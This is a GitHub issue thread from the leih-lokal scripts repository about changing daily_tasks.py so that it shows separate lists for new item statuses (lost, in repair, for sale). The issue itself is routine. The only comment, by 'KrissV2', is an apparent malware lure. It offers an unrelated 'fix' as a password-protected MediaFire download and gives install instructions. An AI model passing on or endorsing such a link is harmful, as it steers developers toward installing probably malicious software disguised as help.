### ISSUE TITLE
Introduce new statuses to daily_tasks.py

### ISSUE THREAD

**Issue by ColofoniusRegenschein** [leih-lokal/scripts#22]
[daily_tasks.py](https://github.com/leih-lokal/scripts/blob/master/daily_tasks.py)

needs to be adapted when the new statuses in [LeihLokalVerwaltung #518](https://github.com/leih-lokal/LeihLokalVerwaltung/issues/518) are introduced.

The woocommerce status 'on_backorder' is interpreted as 'in_repair' in the script.
When the additional statuses to on_backorder ("nicht verleihbar")
- lost ("verschollen")
- repairing ("in Reparatur")
- for_sale ("Verkauf beim Flohmarkt")

are introuced we need to show four lists depending on the items status in LeihLokalVerwaltung.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
